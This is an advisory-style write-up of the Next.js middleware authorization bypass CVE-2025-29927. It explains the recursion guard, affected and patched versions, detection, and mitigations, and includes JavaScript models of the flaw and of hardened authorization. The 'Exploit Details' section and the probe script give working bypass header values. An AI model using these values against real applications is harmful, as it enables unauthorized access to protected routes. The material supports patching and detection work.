Next.js Middleware Exploit: CVE-2025-29927 Authorization Bypass
Summary
A critical vulnerability (CVE-2025-29927) in Next.js has been discovered that enables attackers to bypass middleware security controls through manipulation of the x-middleware-subrequest header. This vulnerability affects authentication, authorization, path rewriting, and security header implementations across multiple Next.js versions, from 11.1.4 through unpatched releases of v14.x and v15.x. It has received a CVSS score of 9.1, classifying it as a critical security risk.
Technical Background
Next.js middleware functions as an interceptor that executes before a request reaches its destination. It's commonly used to implement authentication checks, authorization controls, rewrite paths, redirect requests, and apply security headers. The middleware execution is managed by the runMiddleware function within Next.js.
The vulnerability exists in the internal mechanism designed to prevent infinite middleware recursion loops. As discovered by security researcher Rachid Allam (known as "zhero"), the execution of middleware can be controlled through manipulation of the x-middleware-subrequest header.
In versions before 12.2, when the middleware lived at pages/_middleware, runMiddleware split the header value on colons and, if the resulting list contained the middleware's name, treated the request as one of the server's own internal subrequests and skipped middleware execution entirely.
From 12.2 the middleware file moved to the project root (named middleware, or src/middleware with the src layout), and later releases replaced the simple membership test with a MAX_RECURSION_DEPTH check (set to 5): if the middleware name appears 5 or more times in the colon-separated header value, execution is skipped. The guard exists only to stop the server's own subrequests from recursing forever, but it is reachable by external requests.
The critical security flaw is that this internal protection mechanism accepts and processes the header from any incoming request, including those from external sources, without validation. This allows attackers to craft requests that deliberately bypass middleware security controls.
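The following is an added example, not Next.js source: a minimal model of the loop guard inside runMiddleware (both the pre-12.2 membership test and the later depth test), a toy authentication middleware, and a hardened guard that only honours the header when the request also carries a per-process secret. The function names, the secret value and the toy middleware are illustrative assumptions; the upstream patch takes a similar per-process-id approach, but this is a simplification and not the patch itself.

```javascript
// Added example, not Next.js source. Models the recursion guard that decides
// whether middleware runs, and shows why an attacker-supplied header skips it.

const MAX_RECURSION_DEPTH = 5;

function parseSubrequestHeader(value) {
  return typeof value === 'string' ? value.split(':') : [];
}

// Pre-12.2 guard: any occurrence of the middleware name skips execution.
function skipLegacy(headerValue, middlewareName) {
  return parseSubrequestHeader(headerValue).includes(middlewareName);
}

// Later guard: skip once the name appears MAX_RECURSION_DEPTH times or more.
function skipByDepth(headerValue, middlewareName) {
  const depth = parseSubrequestHeader(headerValue).filter((n) => n === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Hardened guard (added here): only trust the recursion header when the request
// also carries a secret that the server attaches to its own internal subrequests
// and that an external client cannot know.
function makeHardenedGuard(secret) {
  return (headerValue, middlewareName, request) =>
    request.headers['x-middleware-subrequest-id'] === secret &&
    skipByDepth(headerValue, middlewareName);
}

// Toy auth middleware: allow only requests carrying a session cookie.
function authMiddleware(request) {
  const cookie = request.headers.cookie || '';
  return cookie.includes('session=') ? { status: 200 } : { status: 401 };
}

// Model of runMiddleware: the guard decides whether middleware runs at all.
function runMiddleware(request, middlewareName, guard) {
  const header = request.headers['x-middleware-subrequest'];
  if (guard(header, middlewareName, request)) {
    return { status: 200, skipped: true }; // request passes straight through
  }
  return { ...authMiddleware(request), skipped: false };
}

// Run the same unauthenticated request against each guard.
function demo() {
  const attackerHeader = Array(MAX_RECURSION_DEPTH).fill('middleware').join(':');
  const attack = { headers: { 'x-middleware-subrequest': attackerHeader } };
  const legacyAttack = { headers: { 'x-middleware-subrequest': 'pages/_middleware' } };
  const plain = { headers: {} };
  const secret = 'per-process-random-id'; // assumption: generated with a CSPRNG at server start
  const hardened = makeHardenedGuard(secret);
  const internal = {
    headers: { 'x-middleware-subrequest': attackerHeader, 'x-middleware-subrequest-id': secret },
  };
  return {
    legacyBypassed: runMiddleware(legacyAttack, 'pages/_middleware', skipLegacy).skipped,
    depthBypassed: runMiddleware(attack, 'middleware', skipByDepth).skipped,
    depthBlocked: runMiddleware(plain, 'middleware', skipByDepth).status,
    hardenedStatus: runMiddleware(attack, 'middleware', hardened).status,
    hardenedInternalSkipped: runMiddleware(internal, 'middleware', hardened).skipped,
  };
}

console.log(demo());
```

The point of the hardened variant is that the decision to skip is no longer based on a value the client controls: a request with the five-fold header but without the secret id still goes through authMiddleware and receives 401, while the server's own subrequest (which carries the id) is still protected from infinite recursion.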
Exploit Details
The exploit consists of adding a crafted x-middleware-subrequest header to an otherwise ordinary HTTP request for the protected resource:
For versions before 12.2 (middleware at pages/_middleware):
x-middleware-subrequest: pages/_middleware
For 12.2 and later, with middleware.ts (or .js) in the project root:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
If the project uses the src directory layout (src/middleware.ts):
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
Repeating the name five times satisfies both the older membership check and the later depth check, so the same value works across the whole 12.2+ range. Since an attacker usually cannot tell which layout the project uses, both the root and the src variant are tried.
Attack Vectors
This vulnerability enables several attack scenarios:
- Authentication Bypass: attackers can access protected routes without valid credentials or session tokens.
- Content Security Policy (CSP) Bypass: if CSP headers are applied via middleware, the exploit removes them from the response, potentially enabling cross-site scripting (XSS) attacks that the policy would otherwise have blocked.
- Geographic Restrictions Bypass: applications that use middleware to implement region-based content restrictions can have these controls bypassed.
- Security Header Removal: protective headers like HSTS, X-Frame-Options, or X-Content-Type-Options applied by middleware are not set when the middleware is skipped.
- Cache Poisoning: where middleware rewrites a path and a cache sits in front of the application, bypassing the rewrite can cause a 404 or 500 response to be cached for that URL, denying service to other users (a cache-poisoning denial of service, CPDoS).
Affected Versions
- Next.js 11.1.4 to 12.3.4
- Next.js 13.0.0 to 13.5.8
- Next.js 14.0.0 to 14.2.24
- Next.js 15.0.0 to 15.2.2
According to the official GitHub Security Advisory, the following patched versions are available:
- Next.js 12.3.5
- Next.js 13.5.9
- Next.js 14.2.25
- Next.js 15.2.3
Users of affected versions should update to the corresponding patched version, or apply one of the workarounds below if an immediate update is not possible. Only deployments that expose the Next.js server directly to clients are exploitable; where a hosting platform or fronting proxy already strips the header before it reaches the application the bypass does not work, but the application should still be patched rather than relying on that.
Detecting Vulnerable Applications
To identify vulnerable applications, look for:
- The presence of x-powered-by: Next.js in response headers (although this can be disabled with poweredByHeader: false in next.config.js)
- Headers such as x-middleware-rewrite or x-nextjs-cache
- References to /_next/static/ in response bodies
- A different response to the same protected URL with and without the exploit header (for example a 200 where the baseline is a redirect to the login page). Confirm on the response body rather than the status code alone, and remember that the header only has an effect if it reaches the Next.js server unmodified.
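The following probe is an added example covering both the exploit values listed under Exploit Details and the detection indicators above; it is not code from the original advisory or from the Next.js project. It checks the fingerprint indicators on a baseline response and then compares the status with and without each known bypass value. The fetch implementation is injected so the block runs offline against a constructed fake server; the target URL and the fake server's behaviour are assumptions.

```javascript
// Added example: differential probe for the x-middleware-subrequest bypass.
// Nothing here is Next.js code; the fake server below is constructed for the demo.

const BYPASS_VALUES = {
  legacy: 'pages/_middleware',                      // Next.js < 12.2
  root: Array(5).fill('middleware').join(':'),      // middleware.ts in project root
  src: Array(5).fill('src/middleware').join(':'),   // src/middleware.ts
};

const NEXT_HEADERS = ['x-middleware-rewrite', 'x-nextjs-cache'];

// Return the Next.js indicators present in a response. `headers` needs get/has,
// which both the Fetch API's Headers and a Map provide.
function fingerprintNext(headers, body) {
  const found = [];
  if ((headers.get('x-powered-by') || '').includes('Next.js')) found.push('x-powered-by');
  for (const name of NEXT_HEADERS) if (headers.has(name)) found.push(name);
  if (body.includes('/_next/static/')) found.push('/_next/static/');
  return found;
}

// Differential probe: fetch the protected URL once without the header, then once
// per bypass value, and report the first value that changes the status code.
// redirect: 'manual' keeps a login redirect visible as 307 instead of following it.
async function probe(url, fetchImpl) {
  const baseline = await fetchImpl(url, { headers: {}, redirect: 'manual' });
  const body = await baseline.text();
  const result = {
    indicators: fingerprintNext(baseline.headers, body),
    baselineStatus: baseline.status,
    bypass: null,
  };
  for (const [variant, value] of Object.entries(BYPASS_VALUES)) {
    const res = await fetchImpl(url, {
      headers: { 'x-middleware-subrequest': value },
      redirect: 'manual',
    });
    if (res.status !== baseline.status) {
      result.bypass = { variant, value, status: res.status };
      break;
    }
  }
  return result;
}

// Constructed fake server standing in for a self-hosted Next.js app whose
// middleware redirects unauthenticated users to /login. It applies the depth guard
// unless `patched` is true, which models a fixed release ignoring the header.
function makeFakeServer({ middlewareName, patched }) {
  return async (url, { headers }) => {
    const value = headers['x-middleware-subrequest'] || '';
    const depth = value.split(':').filter((n) => n === middlewareName).length;
    const skipped = !patched && depth >= 5;
    const responseHeaders = new Map([
      ['x-powered-by', 'Next.js'],
      ...(skipped ? [] : [['location', '/login']]),
    ]);
    const page = skipped ? '<script src="/_next/static/chunks/main.js"></script>' : '';
    return { status: skipped ? 200 : 307, headers: responseHeaders, text: async () => page };
  };
}

async function main() {
  const vulnerable = makeFakeServer({ middlewareName: 'src/middleware', patched: false });
  const patched = makeFakeServer({ middlewareName: 'src/middleware', patched: true });
  return {
    vulnerable: await probe('https://app.example/admin', vulnerable),
    patched: await probe('https://app.example/admin', patched),
  };
}

main().then((r) => console.log(JSON.stringify(r, null, 2)));
```

Against a real target on Node 18 or later, pass the global fetch as fetchImpl: probe('https://target.example/admin', fetch). A status change is only a signal; a rate limiter or a WAF that blocks the header can also change the status, so confirm by comparing the bodies before concluding the application is vulnerable.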
Mitigation Strategies
Primary Recommendation: Update Immediately
- For Next.js 15.x: Update to ≥ 15.2.3
- For Next.js 14.x: Update to ≥ 14.2.25
- For Next.js 13.x: Update to ≥ 13.5.9
- For Next.js 12.x: Update to ≥ 12.3.5
Secondary Options:
If immediate updating is not possible, implement one of these mitigations:
- Block the header at the web server/proxy level, so it never reaches the Next.js server. This cannot be done inside middleware, since middleware is exactly what the header disables. For Nginx, add the following to the existing location block that proxies to the app (an empty value removes the header from the proxied request):
    location / {
        proxy_set_header x-middleware-subrequest "";
    }
  Note that a proxy_set_header directive in a location block stops that block inheriting proxy_set_header directives from the enclosing server block, so restate Host and X-Forwarded-* headers in the same block if they were set there. For Apache with mod_headers:
    RequestHeader unset x-middleware-subrequest
- Apply WAF rules: if using Cloudflare or a similar service, configure a rule that blocks or strips requests carrying the x-middleware-subrequest header. Legitimate clients never send it, so false positives are unlikely.
- Implement defense in depth: add authorization checks inside route handlers, server components and API endpoints so that each protected resource enforces access itself rather than assuming middleware ran. This limits the impact of this bypass and of any future way of skipping middleware.
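The following is an added example of the defense-in-depth point, not code from the original page or the Next.js project: a route handler that resolves the caller's session from the Cookie header and enforces a role itself, so a request that skipped middleware still gets 401 or 403. The session store, cookie name, token values and role model are constructed for illustration.

```javascript
// Added example: a route handler that does not trust middleware to have run.
// The session store and tokens below are constructed stand-ins for a real backend.

const SESSIONS = new Map([
  ['f3c1a2-admin-token', { userId: 'alice', role: 'admin' }],
  ['9b7d44-user-token', { userId: 'bob', role: 'user' }],
]);

// Minimal Cookie header parser: "a=1; b=2" -> { a: '1', b: '2' }.
function parseCookies(cookieHeader) {
  const out = {};
  for (const part of (cookieHeader || '').split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim();
    if (name) out[name] = value;
  }
  return out;
}

// Resolve the session from the Cookie header alone. Nothing that middleware
// would have set, and nothing the client sends in x-middleware-* headers, is consulted.
function sessionFromHeaders(headers) {
  const token = parseCookies(headers.cookie).session;
  return token ? SESSIONS.get(token) || null : null;
}

// Distinguish "not logged in" (401) from "logged in but not allowed" (403).
function requireRole(headers, role) {
  const session = sessionFromHeaders(headers);
  if (!session) return { status: 401, body: 'authentication required' };
  if (session.role !== role) return { status: 403, body: 'forbidden' };
  return null;
}

// Handler for GET /api/admin/users. In a Next.js app this would be the exported
// GET of app/api/admin/users/route.js reading request.headers.get('cookie');
// here the request is a plain object with lowercase header keys so it runs stand-alone.
function getAdminUsers(request) {
  const denied = requireRole(request.headers, 'admin');
  if (denied) return denied;
  const users = [...SESSIONS.values()].map((s) => s.userId);
  return { status: 200, body: JSON.stringify(users) };
}

// A request carrying the bypass header but no session is still refused,
// because the handler never depended on middleware in the first place.
const bypassAttempt = {
  headers: { 'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware' },
};
console.log(getAdminUsers(bypassAttempt).status); // 401
```

Keeping the authorization decision next to the data it protects is what makes the bypass harmless for this endpoint; middleware remains useful for redirects and headers, but it is not the only gate.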
